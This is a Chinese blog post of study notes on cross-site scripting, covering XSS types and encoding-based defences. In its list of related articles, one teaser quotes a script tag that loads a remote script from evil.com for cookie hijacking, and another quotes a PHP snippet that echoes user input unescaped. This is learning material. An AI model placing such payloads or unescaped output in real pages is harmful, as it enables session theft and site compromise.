白帽子讲web安全笔记-xss总结

最新推荐文章于 2023-03-16 07:00:00 发布
最新推荐文章于 2023-03-16 07:00:00 发布
阅读量727 收藏
点赞数
分类专栏: 前端安全 信息安全 文章标签: javascript 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leonard_wang/article/details/78859431
版权

xss攻击的本质就是攻击者构造的javascript代码得到执行,任何javascript能做到的事情,xss payload都能做到。如果执行的时候恰好也是处于受害者登录的状态,那么危害将更为严重。

有三种形式的xss

反射型xss

用户输入的内容被提交给服务器后,又返回到客户端得到执行

存储型xss

用户输入的内容被提交给服务器后,被保存到数据库,然后当从数据库查询返回的时候,xss payload得到执行

DOM based xss

产生这类xss的本质原因是,在设计web应用程序的时候,就相信用户的输入。所以会在前端的javascript代码使用用户控制的输入,并输出到html中,并且从头到尾都是在客户端,没有和服务器的交互。
所以,不相信用户输入是该在设计应用的时候就要有的意识。

防御xss

最好的办法是使用安全编码,有三种类型的安全编码,Urlencode,javascriptEncode,htmlEncode。对于用户可以控制的输入变量$var,如果是输出到url,就使用Urlencode,如果是输出到事件或者脚本,就使用javascriptEncode,如果是输出到html内容或者属性,就使用htmlEncode。

利用xss

1.诱导受害者点击一个恶意链接,这个恶意链接或者包含恶意js代码,或者跳转到包含恶意js代码的页面。
2.存储型

leonard_wang
关注
专栏目录
白帽子web安全笔记
LYX_WIN
05-12 541
一、Secure By Default原则 1、黑名单和白名单 比如,在制定防火墙的网络访问控制策略时,如果网站只提供 Web 服务,那么正确的做法 是只允许网站服务器的 80 和 443 端口对外提供服务,屏蔽除此之外的其他端口。这是一种“白 名单”的做法;如果使用“黑名单”,则可能会出现问题。假设黑名单的策略是:不允许 SSH 端口对 Internet 开放,那么就要审计 SSH 的默认端口:22 端口是否开放了 Internet。但在实际 工作过程中,经常会发现有的工程师为了偷懒或图方便,私自改变
分享笔记1 之《白帽子web安全
m0_46583081的博客
12-06 429
分享笔记(一)之《白帽子web安全
白帽子Web安全】第七章注入攻击读书笔记
weixin_44722125的博客
03-21 308
7 注入攻击 两个关键条件: 第一个是用户能够控制输入。 第二个是原本程序要执行的代码,拼接了用户输入的数据。 7.1 SQL注入 在拼接的过程中导致代码注入,也可利用错误回显进行注入。 7.1.1 盲注 盲注,即在服务器没有错误回显时进行的注入攻击, 常用的方法:构造简单的条件语句,根据返回页面是否发生变化,来判断SQL语句是否执行。 在攻击者构造条件 “and 1=1” 时。如果页面正常返回,...
白帽子web安全笔记——XSS(一)
weixin_40949950的博客
09-20 397
XSS  跨站脚本攻击 三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器 2.存储型:把用户输入的数据“存储”在服务器端   具有很强的稳定性 3.DOM Based:修改页面的DOM节点形成的 XSS攻击:   Cookie劫持 先加载一个远程脚本    <script src=http://www.evil.com/evil.js></scrip...
学习笔记白帽子Web安全》之XSS
Killua
01-28 426
1.xss简介(js和html都是用来写前端)  跨站脚本攻击,英文全称(Cross Site Script),本来的缩写CSS,与层叠样式表CSS相同,为了区分在安全界把它称为XSSXSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入恶意的脚本,从而在用户浏览网页时,控制浏览器的一种攻击。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强,且产生的场景复杂,难以一...
白帽子Web安全(第一章总结
jklove9的博客
10-10 772
1.1实施安全评估的基本过程 安全问题的本质:信任问题 信任域,信任边界 安全三要素:机密性,完整性,可用性 如何实施安全评估? 资产等级划分------------------威胁分析------------风险分析---------------------确认解决方案 资产等级划分:明确目标是什么,要保护什么,互联网安全的核心问题,是数据安全的问题,对互联网公司拥有的资产进行等级划分,就是对数据做等级划分。例如有的公司最关心的是客户资料,有的公司最关注的员工资料信息,做等级划分的过程,需要同
白帽子Web安全 读书笔记
03-12
### 白帽子Web安全读书笔记一:关键知识点解析 #### 第零篇 总览 - **客户端脚本安全**:这部分主要关注浏览器环境下的安全问题,包括浏览器自身的安全机制以及用户与网页交互过程中可能遇到的安全风险。 - **...
白帽子web安全》学习笔记——web安全概述
a2562614613的博客
08-28 814
一、安全的三要素 1、机密性 机密性要求保护数据内容不被泄露,加密是实现机密性要求的常见方法,比如常见的对称加密算法和非堆成加密算法。 2、完整性 完整性要求保护数据内容是完整的,没有被篡改,常见的保证一致性的技术手段是数据签名。 3、可用性 可用性要求保护资源是“随需而得”。安全领域中,拒绝服务攻击破坏得就职安全的可用应。 安全领域中,除以上要素外,仍然存在一些其他要素,比如不可抵赖性、可审计性,但最重要的要素便是以上三个。在...
Web黑客技术揭密》第六章-漏洞挖掘笔记-结合白帽子web安全
lynnez_dd的博客
02-20 403
CSRF漏洞挖掘需要确认以下信息: 目标表单是否有有效的token随机串 目标表单是否有验证码 目标是否判断了Referer来源 根目录下 crossdoman.xml的 allow-access-from domain 是否是通配符 目标JSON是否可以自定义callback等 界面劫持漏洞挖掘需要确认以下信息: 目标HTTP响应头是否设置了X-Frame-...
Web安全笔记
naiba01的博客
02-21 950
  最近读了吴翰清的《白帽子Web安全》,学到了不少东西。现把书中的知识点梳理一遍,以便记忆。以下内容是我根据《白帽子Web安全》和自己的理解整理的,如有不够清晰或误导的地方,可以查看原书。   随着网页技术的飞速发展,越来越多的黑客把攻击的目光投向网页。因而,Web安全也愈发显得重要。   评判一个网页是否安全,可以分析网站是否具有具备安全三要素:机密性(Confidentiality)...
白帽子web安全读后感1
南浦
02-07 2508
白帽子web安全读后感1 本文实际上算是白帽子web安全的回顾,总结了一些我觉得比较重要的关键词,方便以后复习.具体内容可以参考书 浏览器安全 本文对应第2章节,主要的内容是同源策略.当然也可以参考阮一峰老师的文章 终止就是要保证协议,域名和端口的一致,如果看到提示cros错误就要考虑这个问题. 另外现在app开发喜欢采用浏览器套壳的策略,同时还有h5小程序开发,总之前端技术大有可为. 跨站脚本攻击(XSS) 本文是第三章 跨站脚本攻击(Cross Site Script,简称 XSS),利用网页开发时
白帽子web安全读后感
wswr的博客
03-11 1025
第一章 我的安全世界观 安全问题本质就是信任问题【你总要制定一个基准以此判断是否安全,这个基准怎么理解呢,比方上传文件,做的限制和过滤就是一个基准,通过这个基准你去信任自己是否是安全的】 安全是一个持续的过程【攻防都在进步,道高一尺魔高一丈,不断出现的漏洞和对应补丁就是很好的例子去理解为什么持续的安全白帽子兵法: Secure by Default(默认的安全)一方面是白名单思想【黑名单存在被各种可能的绕过】,一方面是最小权限原则(最差的情况即使被攻克了,拿到的权限也不高) 纵深防御原则:一方
web安全学习笔记
(づ。◕‿‿◕。)づgigi奋斗在前端和刷题中╮(╯﹏╰)╭
08-17 2243
XSS 跨站脚本攻击,指攻击者在网页中嵌入恶意脚本,当用户浏览此网页时脚本就会执行,从而达到攻击者的目的,比如获取cookie、导航到恶意网站等。 分类 反射型XSS 将用户输入的存在XSS攻击的数据,发送给后台,后台并未对数据进行存储,也未经过任何过滤和转义,直接返回给客户端被浏览器渲染。就可能导致XSS攻击; 假设站点http://www.test.com/xss/refl
白帽子web安全XSS)学习笔记
weixin_42811970的博客
07-28 323
XSS攻击是什么 通常指黑客通过“HTML注入”篡改网页、插入恶意脚本,从而在用户浏览页面是控制用户浏览器的一种攻击。 XSS攻击类型 反射型XSS:需要用户“点击”一个恶意链接,把用户输入的数据“反射”给浏览器,才能攻击成功。也叫做“非持久型XSS”(Non-persistent XSS) 存储型XSS:会把用户输入的数据”存储“在服务器端,有很强的稳定性,也叫做”持...
白帽子Web安全学习之XSS
qq_44874027的博客
04-11 3048
1.XSS简介 跨站脚本攻击(Cross Site Sript)缩写XSSXSS攻击通常指黑客通过HTML注入篡改了网页,插入了恶意脚本,从而在用户浏览网页时,控制用户的浏览器的一种攻击方式。下面看个例子 <?php $input = $_GET["param"]; echo "<div>".$input."</div>"; ?> 正常情况下,用户输入数据提交param后,代码会将其输入的展示到页面中,但是由于没有对用户输入进行限制,如果用户输入以下代码:
【慕课网】WEB安全-XSS学习笔记
Cyan1614的博客
06-06 572
一、XSS课程大概介绍 二、XSS的攻击方式 反射型:发出请求时,XSS代码出现在url中,作为输入提交到服务器端,服务端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。 存储型:存储型XSS和反射型XSS的差别在于,提交代码会存储在服务器端(数据库、内存、文件系统等),下次请求目标页面时不同再提交XSS代码。    
白帽子Web安全》3-跨站脚本攻击(XSS
CD的博客
03-28 1178
第3章 跨站脚本攻击(XSS)3.1 XSS简介 Cross Site Script,跨站脚本攻击,简称XSSXSS攻击,通常是指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在客用户浏览网页时,控制用户浏览器的一种攻击。 XSS分类 反射型XSS 存储型XSS DOM Based XSS 3.2 XSS攻击进阶 XSS Payload JavaScript脚本 最简单的:窃取C
白帽子Web安全》学习笔记
最新发布
Innocence_0的博客
03-16 134
白帽子Web安全》学习笔记
白帽子Web安全》- 吴翰清著 - 网络安全深度解析
"白帽子 Web 安全,吴翰清著,电子工业出版社出版,内容涵盖Web安全的各个方面,旨在让读者理解并掌握网络安全技术,包括黑客攻击手段、防御策略和安全运营流程。书中结合作者的实战经验,提供了具有高度可操作性...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值